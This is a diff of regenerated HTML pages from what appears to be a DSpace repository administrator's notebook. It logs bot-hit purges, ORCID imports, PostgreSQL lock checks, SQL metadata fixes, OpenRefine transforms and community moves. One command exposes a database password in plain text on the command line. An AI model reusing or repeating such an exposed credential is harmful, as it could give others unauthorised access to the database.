Purging 1190 hits from 216.213.28.136 in statistics
Purging 1128 hits from 207.182.27.191 in statistics
Purging 1095 hits from 216.41.235.187 in statistics
Purging 1087 hits from 216.41.232.169 in statistics
Purging 1011 hits from 216.41.235.186 in statistics
Purging 945 hits from 52.124.19.190 in statistics
Purging 933 hits from 216.213.28.138 in statistics
Purging 930 hits from 216.41.234.163 in statistics
Purging 4410 hits from 45.146.166.173 in statistics
Purging 2688 hits from 45.134.26.171 in statistics
Purging 1130 hits from 45.146.164.123 in statistics
Purging 536 hits from 45.155.205.231 in statistics
Purging 10676 hits from 195.54.167.122 in statistics
Purging 1350 hits from 54.76.137.83 in statistics
Purging 1240 hits from 34.253.119.85 in statistics
Purging 2879 hits from 34.216.201.131 in statistics
Purging 2909 hits from 54.203.193.46 in statistics
Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 37959
</code></pre></div><!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips-to-purge.txt -p
</span></span><span style="display:flex;"><span>Purging 1190 hits from 216.213.28.136 in statistics
</span></span><span style="display:flex;"><span>Purging 1128 hits from 207.182.27.191 in statistics
</span></span><span style="display:flex;"><span>Purging 1095 hits from 216.41.235.187 in statistics
</span></span><span style="display:flex;"><span>Purging 1087 hits from 216.41.232.169 in statistics
</span></span><span style="display:flex;"><span>Purging 1011 hits from 216.41.235.186 in statistics
</span></span><span style="display:flex;"><span>Purging 945 hits from 52.124.19.190 in statistics
</span></span><span style="display:flex;"><span>Purging 933 hits from 216.213.28.138 in statistics
</span></span><span style="display:flex;"><span>Purging 930 hits from 216.41.234.163 in statistics
</span></span><span style="display:flex;"><span>Purging 4410 hits from 45.146.166.173 in statistics
</span></span><span style="display:flex;"><span>Purging 2688 hits from 45.134.26.171 in statistics
</span></span><span style="display:flex;"><span>Purging 1130 hits from 45.146.164.123 in statistics
</span></span><span style="display:flex;"><span>Purging 536 hits from 45.155.205.231 in statistics
</span></span><span style="display:flex;"><span>Purging 10676 hits from 195.54.167.122 in statistics
</span></span><span style="display:flex;"><span>Purging 1350 hits from 54.76.137.83 in statistics
</span></span><span style="display:flex;"><span>Purging 1240 hits from 34.253.119.85 in statistics
</span></span><span style="display:flex;"><span>Purging 2879 hits from 34.216.201.131 in statistics
</span></span><span style="display:flex;"><span>Purging 2909 hits from 54.203.193.46 in statistics
</span></span><span style="display:flex;"><span>Purging 1822 hits from 2605\:b100\:316\:7f74\:8d67\:5860\:a9f3\:d87c in statistics
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 37959
</span></span></code></pre></div><!-- raw HTML omitted -->


@ -24,7 +24,7 @@ Start a full harvest on AReS
Start a full harvest on AReS
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -122,12 +122,12 @@ Start a full harvest on AReS
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2022-01-06-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Jones, Chris&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span>
</code></pre></div><h2 id="2022-01-09">2022-01-09</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2022-01-06-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
</span></span><span style="display:flex;"><span>&#34;Jones, Chris&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
</span></span><span style="display:flex;"><span>&#34;Jones, Christopher S.&#34;,&#34;Chris Jones: 0000-0001-9096-9728&#34;
</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63 -u dspacetest -p <span style="color:#e6db74">&#39;dom@in34sniper&#39;</span>
</span></span></code></pre></div><h2 id="2022-01-09">2022-01-09</h2>
<ul>
<li>Validate and register CGSpace on <a href="https://www.openarchives.org/Register/ValidateSite?log=Z2V7WCT7">OpenArchives</a>
<ul>
@ -147,21 +147,21 @@ $ ./ilri/add-orcid-identifiers-csv.py -i 2022-01-06-add-orcids.csv -db dspace63
<ul>
<li>I tried to re-build the Docker image for OpenRXV and got an error in the backend:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">...
&gt; openrxv-backend@0.0.1 build
&gt; nest build
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
~~~~~~~~~~~~~~~~~~~~~
node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>&gt; openrxv-backend@0.0.1 build
</span></span><span style="display:flex;"><span>&gt; nest build
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>node_modules/@elastic/elasticsearch/api/types.d.ts:2454:13 - error TS2456: Type alias &#39;AggregationsAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>2454 export type AggregationsAggregate = AggregationsSingleBucketAggregate | AggregationsAutoDateHistogramAggregate | AggregationsFiltersAggregate | AggregationsSignificantTermsAggregate&lt;any&gt; | AggregationsTermsAggregate&lt;any&gt; | AggregationsBucketAggregate | AggregationsCompositeBucketAggregate | AggregationsMultiBucketAggregate&lt;AggregationsBucket&gt; | AggregationsMatrixStatsAggregate | AggregationsKeyedValueAggregate | AggregationsMetricAggregate
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span>node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type alias &#39;AggregationsSingleBucketAggregate&#39; circularly references itself.
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>3209 export type AggregationsSingleBucketAggregate = AggregationsSingleBucketAggregateKeys
</span></span><span style="display:flex;"><span> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Found 2 error(s).
</span></span></code></pre></div><ul>
<li>Ah, it seems the code on the server was slightly out of date
<ul>
<li>I checked out the latest master branch and it built</li>
@ -180,20 +180,20 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (3506 rows)
1 application_name
9 psql
10
3487 dspaceWeb
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (3506 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 10
</span></span><span style="display:flex;"><span> 3487 dspaceWeb
</span></span></code></pre></div><ul>
<li>As before, I see messages from PostgreSQL about processes waiting for locks since I enabled the <code>log_lock_waits</code> setting last month:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
12
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>12
</span></span></code></pre></div><ul>
<li>I set a system alert on DSpace and then restarted the server</li>
</ul>
<h2 id="2022-01-20">2022-01-20</h2>
@ -204,8 +204,8 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-01-20-green-covers.map
</code></pre></div><h2 id="2022-01-21">2022-01-21</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34;</span> dspace import --add --eperson<span style="color:#f92672">=</span>aorth@mjanja.ch --source /tmp/SimpleArchiveFormat --mapfile<span style="color:#f92672">=</span>./2022-01-20-green-covers.map
</span></span></code></pre></div><h2 id="2022-01-21">2022-01-21</h2>
<ul>
<li>Start working on the rest of the ~980 CGIAR TAC and ICW documents from Gaia
<ul>
@ -243,21 +243,21 @@ node_modules/@elastic/elasticsearch/api/types.d.ts:3209:13 - error TS2456: Type
</li>
<li>Normalize the metadata <code>text_lang</code> attributes on CGSpace database:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
text_lang | count
-----------+---------
en_US | 2803350
en | 6232
| 3200
fr | 2
vn | 2
92 | 1
sp | 1
| 0
(8 rows)
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;92&#39;, &#39;&#39;);
UPDATE 9433
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
</span></span><span style="display:flex;"><span> text_lang | count
</span></span><span style="display:flex;"><span>-----------+---------
</span></span><span style="display:flex;"><span> en_US | 2803350
</span></span><span style="display:flex;"><span> en | 6232
</span></span><span style="display:flex;"><span> | 3200
</span></span><span style="display:flex;"><span> fr | 2
</span></span><span style="display:flex;"><span> vn | 2
</span></span><span style="display:flex;"><span> 92 | 1
</span></span><span style="display:flex;"><span> sp | 1
</span></span><span style="display:flex;"><span> | 0
</span></span><span style="display:flex;"><span>(8 rows)
</span></span><span style="display:flex;"><span>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN (&#39;en&#39;, &#39;92&#39;, &#39;&#39;);
</span></span><span style="display:flex;"><span>UPDATE 9433
</span></span></code></pre></div><ul>
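<li>(The arithmetic checks out: 6,232 <code>en</code> + 3,200 empty + 1 <code>92</code> = 9,433 rows updated)</li>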
<li>Then export the WLE Journal Articles collection again so there are fewer columns to mess with</li>
</ul>
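<p>That export is presumably just the usual <code>metadata-export</code> against the collection handle (hypothetical handle shown):</p>
<pre tabindex="0"><code>$ dspace metadata-export -i 10568/xxxxx -f /tmp/wle-journal-articles.csv
</code></pre>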
<h2 id="2022-01-26">2022-01-26</h2>
@ -273,7 +273,7 @@ UPDATE 9433
</ul>
</li>
</ul>
<pre tabindex="0"><code>cells['dcterms.bibliographicCitation[en_US]'].value.split(&quot;doi: &quot;)[1]
<pre tabindex="0"><code>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.split(&#34;doi: &#34;)[1]
</code></pre><ul>
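<li>For example, a hypothetical citation ending in <code>&hellip; 12 p. doi: 10.1234/abcd</code> would yield <code>10.1234/abcd</code>, since <code>split()</code> breaks the string on the literal <code>doi: </code> marker and <code>[1]</code> takes what follows it</li>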
<li>I also spent a bit of time cleaning up ILRI Journal Articles, but I notice that we don&rsquo;t put DOIs in the citation so it&rsquo;s not possible to fix items that are missing DOIs that way
<ul>
@ -286,17 +286,17 @@ UPDATE 9433
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
1
1 ------------------
1 (537 rows)
1 application_name
9 psql
51 dspaceApi
477 dspaceWeb
$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
3
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#34;SELECT application_name FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid&#34;</span> | sort | uniq -c | sort -n
</span></span><span style="display:flex;"><span> 1
</span></span><span style="display:flex;"><span> 1 ------------------
</span></span><span style="display:flex;"><span> 1 (537 rows)
</span></span><span style="display:flex;"><span> 1 application_name
</span></span><span style="display:flex;"><span> 9 psql
</span></span><span style="display:flex;"><span> 51 dspaceApi
</span></span><span style="display:flex;"><span> 477 dspaceWeb
</span></span><span style="display:flex;"><span>$ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgresql/postgresql-10-main.log | grep -c <span style="color:#e6db74">&#39;still waiting for&#39;</span>
</span></span><span style="display:flex;"><span>3
</span></span></code></pre></div><ul>
<li>I set a system alert on CGSpace and then restarted Tomcat and PostgreSQL
<ul>
<li>The issue in Francesca&rsquo;s case was actually that someone had taken the task, not that PostgreSQL transactions were locked!</li>
@ -344,19 +344,19 @@ $ grep -E <span style="color:#e6db74">&#39;^2022-01*&#39;</span> /var/log/postgr
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">value.contains(/:\s?\d+(-|)\d+/)
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>value.contains(/:\s?\d+(-|)\d+/)
</span></span></code></pre></div><ul>
<li>Then I faceted by blank on <code>dcterms.extent</code> and did a transform to extract the page information for over 1,000 items!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">&#39;p. &#39; +
cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
&#39;-&#39; +
cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#39;p. &#39; +
</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[0] +
</span></span><span style="display:flex;"><span>&#39;-&#39; +
</span></span><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*:\s?(\d+)(-|)(\d+).*/)[2]
</span></span></code></pre></div><ul>
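<li>As a sanity check with a hypothetical citation ending in <code>16(1): 25-42</code>: the zero-based capture groups are <code>25</code>, <code>-</code> and <code>42</code>, so the transform produces <code>p. 25-42</code></li>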
<li>Then I did the same for <code>cg.volume</code> and <code>cg.issue</code>, also based on the citation, for example to extract the &ldquo;16&rdquo; from &ldquo;Journal of Blah 16(1)&rdquo;, where &ldquo;16&rdquo; is the second capture group in a zero-based match:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>cells[&#39;dcterms.bibliographicCitation[en_US]&#39;].value.match(/.*( |;)(\d+)\((\d+)\).*/)[1]
</span></span></code></pre></div><ul>
<li>This was 3,000 items so I imported the changes on CGSpace 1,000 at a time&hellip;</li>
</ul>
<!-- raw HTML omitted -->


@ -38,7 +38,7 @@ We agreed to try to do more alignment of affiliations/funders with ROR
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -138,44 +138,44 @@ We agreed to try to do more alignment of affiliations/funders with ROR
<ul>
<li>I moved a bunch of communities:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115089
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115087
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/108598
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/1
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/35697 --child<span style="color:#f92672">=</span>10568/80211
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2517
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10947/2517
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/89416
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/3530
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80099
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80100
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/34494
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/114644
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/16573
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/42211
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/109945
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/16498
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/99453
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/2983
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/133
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/1208
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/1208
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/56924
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/56924
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/91688
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10568/91688
$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2515
$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10947/2515
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115089
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/114639 --child<span style="color:#f92672">=</span>10568/115087
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/108598
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/1
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/35697 --child<span style="color:#f92672">=</span>10568/80211
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2517
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10947/2517
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/89416
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/3530
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80099
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/80100
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/97114 --child<span style="color:#f92672">=</span>10568/34494
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/114644
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/16573
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117867 --child<span style="color:#f92672">=</span>10568/42211
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/109945
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/16498
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/99453
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/2983
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/133
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/1208
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/1208
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/56924
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10568/117865 --child<span style="color:#f92672">=</span>10568/56924
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10568/91688
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10568/91688
</span></span><span style="display:flex;"><span>$ dspace community-filiator --remove --parent<span style="color:#f92672">=</span>10568/83389 --child<span style="color:#f92672">=</span>10947/2515
</span></span><span style="display:flex;"><span>$ dspace community-filiator --set --parent<span style="color:#f92672">=</span>10947/1 --child<span style="color:#f92672">=</span>10947/2515
</span></span></code></pre></div><ul>
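<li>(<code>community-filiator --set</code> makes the child a sub-community of the parent and <code>--remove</code> detaches it from one, so moving a community between parents is a <code>--remove</code> followed by a <code>--set</code>)</li>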
<li>Remove CPWF and CTA subjects from the Discovery facets</li>
<li>Start a full Discovery index on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>real 275m15.777s
user 182m52.171s
sys 2m51.573s
</code></pre></div><ul>
